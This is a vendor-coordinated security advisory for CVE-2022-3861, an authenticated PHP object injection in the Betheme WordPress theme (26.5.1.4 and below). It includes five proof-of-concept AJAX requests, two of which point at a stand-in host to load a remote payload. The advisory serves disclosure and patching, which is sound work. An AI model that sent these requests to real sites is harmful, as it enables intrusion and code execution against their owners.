Get in touch

Betheme <= 26.5.1.4 - Authenticated (Contributor+) PHP Object Injection

Nov 18, 2022 · By Julien Ahrens

ADVISORY INFORMATION

  • Product: Betheme
  • Vendor URL: https://muffingroup.com/betheme
  • Type: Deserialization of Untrusted Data [CWE-502]
  • Date found: 2022-11-02
  • Date published: 2022-11-18
  • CVSSv3 Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
  • CVE: CVE-2022-3861

CREDITS

This vulnerability was discovered and researched by Julien Ahrens from RCE Security.

VERSIONS AFFECTED

BeTheme 26.5.1.4 and below

INTRODUCTION

Ever since Betheme was just an idea, we knew that it would be different from all other multipurpose WordPress themes we’d tried before.

We wanted to build something more than just another WordPress theme, that could easily adapt to any project you need to work on without writing any code. A theme designed from scratch to save your time & help you enjoy your freedom…

(from the vendor’s homepage)

VULNERABILITY DETAILS

The WordPress theme is vulnerable to multiple PHP Object injections when processing input to multiple, privileged Wordpress ajax routes:

  • mfn_builder_import -> “mfn-items-import” parameter
  • mfn_builder_import_page -> “mfn-items-import-page” parameter
  • importdata -> “import” parameter
  • importsinglepage -> “import” parameter
  • importfromclipboard -> “import” parameter

To successfully exploit this vulnerability, an attacker must be authenticated with at least Wordpress “Contributer” rights.

Successful exploits can allow the attacker to execute arbitrary code.

PROOF OF CONCEPT

To exploit the “mfn_builder_import” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 75
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import&mfn-items-import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the “mfn_builder_import_page” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=mfn_builder_import_page&mfn-items-import-page=https://your-remote-payload.com/

To exploit the “importdata” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 114
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importdata&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

To exploit the “importsinglepage” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 83
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importsinglepage&import=https://your-remote-payload.com/

To exploit the “importfromclipboard” ajax action, use:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Length: 123
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: [your-auth-cookies]
Connection: close

mfn-builder-nonce=[your-nonce]&action=importfromclipboard&import=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=

SOLUTION

Update to version 26.6

REPORT TIMELINE

  • 2022-11-01: Discovery of the vulnerability
  • 2022-11-03: CVE requested from Wordfence (CNA)
  • 2022-11-04: Wordfence assigns CVE-2022-3861
  • 2022-11-08: Vendor notification
  • 2022-11-08: Opened up a security support case on envato.com since the vendor usually doesn’t respond
  • 2022-11-16: Envato responds stating that the vendor released 26.6 which fixes this vulnerability
  • 2022-11-18: Public disclosure

REFERENCES

None